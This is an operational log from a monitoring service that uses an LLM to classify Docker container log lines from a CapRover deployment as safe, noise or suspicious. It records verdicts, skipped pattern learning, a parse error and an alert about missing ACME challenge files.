Mar 19 22:29:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:48.687295 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:29:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:48.687331 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:51.879884 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:29:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:51.879929 [analyzer] Source hint mismatch: LLM says "docker container web/api server access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:54.958778 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 19 22:29:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:54.958839 [analyzer] Source hint mismatch: LLM says "docker/captain (web/API in container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:57.990410 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:29:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:57.990451 [analyzer] Source hint mismatch: LLM says "docker/captain web access log (app HTTP server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:29:59 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:59.041453 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=regex
Mar 19 22:29:59 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:29:59.041491 [analyzer] Source hint mismatch: LLM says "nginx access log (captain-nginx container)", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern
Mar 19 22:30:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:00.925982 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:30:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:00.926022 [analyzer] Source hint mismatch: LLM says "docker container access logs (api service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:04 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:04.013723 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=contains
Mar 19 22:30:04 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:04.013762 [analyzer] Source hint mismatch: LLM says "dockerized web/API service (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:06.160559 [observer] Pipeline: processed=266 pattern_hits=145 llm_calls=120 llm_errors=2 learned=0
Mar 19 22:30:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:06.160624 [observer] Patterns: hash=145 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=121
Mar 19 22:30:07 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:07.494859 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:30:07 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:07.494903 [analyzer] Source hint mismatch: LLM says "docker container web/API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:09.706752 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:30:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:09.706788 [analyzer] Source hint mismatch: LLM says "docker-captain (containerized web/API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:12.909247 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:30:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:12.909285 [analyzer] Source hint mismatch: LLM says "docker container access logs (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:15.853339 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:30:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:15.853379 [analyzer] Source hint mismatch: LLM says "docker container web/app access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:18.675621 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.74 action=suppress pattern_type=prefix
Mar 19 22:30:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:18.675657 [analyzer] Source hint mismatch: LLM says "docker container HTTP access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:21.958096 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:30:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:21.958186 [analyzer] Source hint mismatch: LLM says "docker/captain (web service access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:24.638925 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:30:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:24.638964 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:25.738116 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:30:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:25.738155 [analyzer] Source hint mismatch: LLM says "docker containerized web service (API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:27.914106 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.66 action=allow pattern_type=prefix
Mar 19 22:30:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:27.914145 [analyzer] Source hint mismatch: LLM says "docker container (web app HTTP access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:30.939348 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:30:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:30.939384 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:34 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:34.028881 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:30:34 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:34.028924 [analyzer] Source hint mismatch: LLM says "docker container web/api proxy", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:36.161448 [observer] Pipeline: processed=291 pattern_hits=159 llm_calls=131 llm_errors=2 learned=0
Mar 19 22:30:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:36.161473 [observer] Patterns: hash=159 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=132
Mar 19 22:30:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:36.811614 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix
Mar 19 22:30:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:36.811647 [analyzer] Source hint mismatch: LLM says "docker container web service access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:39.676987 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:30:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:39.677026 [analyzer] Source hint mismatch: LLM says "docker-captain (app HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:42.735080 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:30:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:42.735118 [analyzer] Source hint mismatch: LLM says "docker/captain (app proxy or service access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:45.736585 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:30:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:45.736758 [analyzer] Source hint mismatch: LLM says "docker container web/API service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:48.983217 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:30:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:48.983254 [analyzer] Source hint mismatch: LLM says "docker/captain (app web server access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:51.689542 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:30:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:51.689578 [analyzer] Source hint mismatch: LLM says "docker container access log (application HTTP)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:54.972221 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=regex
Mar 19 22:30:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:54.972254 [analyzer] Source hint mismatch: LLM says "docker container access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:30:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:57.785852 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:30:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:30:57.785891 [analyzer] Source hint mismatch: LLM says "docker container (web/API server access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:00.957208 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:31:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:00.957244 [analyzer] Source hint mismatch: LLM says "docker container web/app (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:03.794946 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:31:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:03.794982 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) running an HTTP API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:06.160356 [observer] Pipeline: processed=314 pattern_hits=172 llm_calls=141 llm_errors=2 learned=0
Mar 19 22:31:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:06.160376 [observer] Patterns: hash=172 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=142
Mar 19 22:31:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:06.761519 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix
Mar 19 22:31:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:06.761557 [analyzer] Source hint mismatch: LLM says "docker container web/API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:09.934636 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=contains
Mar 19 22:31:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:09.934673 [analyzer] Source hint mismatch: LLM says "docker/captain container access logs (HTTP API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:12.798585 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:31:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:12.798626 [analyzer] Source hint mismatch: LLM says "docker container access log (api service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:15.711515 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:31:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:15.711555 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:18.887664 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=contains
Mar 19 22:31:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:18.887703 [analyzer] Source hint mismatch: LLM says "docker container (web/API service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:24.833100 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix
Mar 19 22:31:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:24.833140 [analyzer] Source hint mismatch: LLM says "docker/captain (web access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:26.164907 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:31:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:26.164945 [analyzer] Source hint mismatch: LLM says "docker container access logs / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:27.658647 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:31:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:27.658680 [analyzer] Source hint mismatch: LLM says "docker-captain (containerized web/API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:30.919723 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:31:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:30.919760 [analyzer] Source hint mismatch: LLM says "dockerized web service/API (captain-captain container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:32 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:32.002614 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 19 22:31:32 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:32.002652 [analyzer] Source hint mismatch: LLM says "docker container (certbot)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:33.613028 [llm] Failed to parse verdict from: {
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:   "classification": "safe",
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:   "confidence": 0.84,
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:   "reason": "This appears to be a routine certbot certificate renewal command executed by a known container.",
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:   "action": "allow",
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:   "pattern_type": "prefix",
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:   "pattern": "executeCommand Container: captain-certbot certbot renew --non-interactive",
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:   "source_hint": "docker/exec in captain-certbot container",
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:   "variable_fields": [
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:     {
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:       "token": "2026-03-19T22:31:32.325528259Z",
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:       "type": "timestamp",
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:       "replacement": "<TS>"
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:     },
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:     {
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:       "token": "March 19th 2026, 10:31:32.325 pm ",
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:       "type": "timestamp",
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:       "replacement": "<TS>"
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:     }
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]:   ]
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: }
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:33.613067 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: invalid character '\x1b' in string literal
Mar 19 22:31:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:33.613077 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:31:32.325528259Z March 19th 2026, 10:31:32.325 pm    executeCommand Container...
Mar 19 22:31:34 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:34.758750 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:31:34 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:34.758785 [analyzer] Source hint mismatch: LLM says "docker container (web/API service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:35 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:35.193241 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 19 22:31:35 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:35.193280 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx error shows open() failed for a specific ACME challenge token path; repeated missing challenge files can indicate failed/aborted certificate validation attempts or misconfiguration rather than normal operation. Line=2026-03-19T22:31:33.376974387Z 2026/03/19 22:31:33 [error] 408#408: *741437 open() "/usr/share/nginx/default/.well-known/acme-challenge/iYFHqno9VfY8hIy2K3E1W8C_3ZmBGd0Zov_6RmDmY3g" failed (2: No such ...
Mar 19 22:31:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:36.161572 [observer] Pipeline: processed=341 pattern_hits=185 llm_calls=155 llm_errors=3 learned=0
Mar 19 22:31:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:36.161599 [observer] Patterns: hash=185 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=156
Mar 19 22:31:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:36.620153 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:31:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:36.620215 [analyzer] Source hint mismatch: LLM says "docker container (certificate renewal / load balancer maintenance)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:36.929586 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:31:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:36.929626 [analyzer] Source hint mismatch: LLM says "nginx in Docker", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern
Mar 19 22:31:37 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:37.598231 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=contains
Mar 19 22:31:37 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:37.598265 [analyzer] Source hint mismatch: LLM says "docker/nginx (reload manager or entrypoint)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:38 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:38.055616 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=noise confidence=0.78 action=suppress pattern_type=prefix
Mar 19 22:31:38 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:38.055650 [analyzer] Source hint mismatch: LLM says "nginx (docker container captain-nginx)", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern
Mar 19 22:31:38 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:38.743967 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:31:38 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:38.744009 [analyzer] Source hint mismatch: LLM says "docker/container exec (nginx config test)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:39.367784 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=noise confidence=0.78 action=suppress pattern_type=prefix
Mar 19 22:31:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:39.367818 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+)
Mar 19 22:31:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:39.750631 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.72 action=suppress pattern_type=prefix
Mar 19 22:31:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:39.750666 [analyzer] Source hint mismatch: LLM says "docker/captain-captain container (app reload automation)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:40.374596 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=noise confidence=0.72 action=suppress pattern_type=prefix
Mar 19 22:31:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:40.374634 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 19 22:31:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:40.810509 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:31:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:40.810545 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:41 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:41.333737 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=noise confidence=0.88 action=suppress pattern_type=prefix
Mar 19 22:31:41 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:41.333774 [analyzer] Learned prefix pattern for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo [suppress]: "the \"listen ... http2\" directive is deprecated, use the \"http2\" directive instead in /etc/nginx/conf.d/captain.conf:"
Mar 19 22:31:41 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:41.835785 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:31:41 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:41.835823 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain) managing NGINX reloads", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:42.854222 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:31:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:42.854257 [analyzer] Source hint mismatch: LLM says "docker container access log (app/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:44 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:44.022796 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:31:44 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:44.022833 [analyzer] Source hint mismatch: LLM says "docker:captain (captain-captain service access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:31:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:31:45.179541 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix
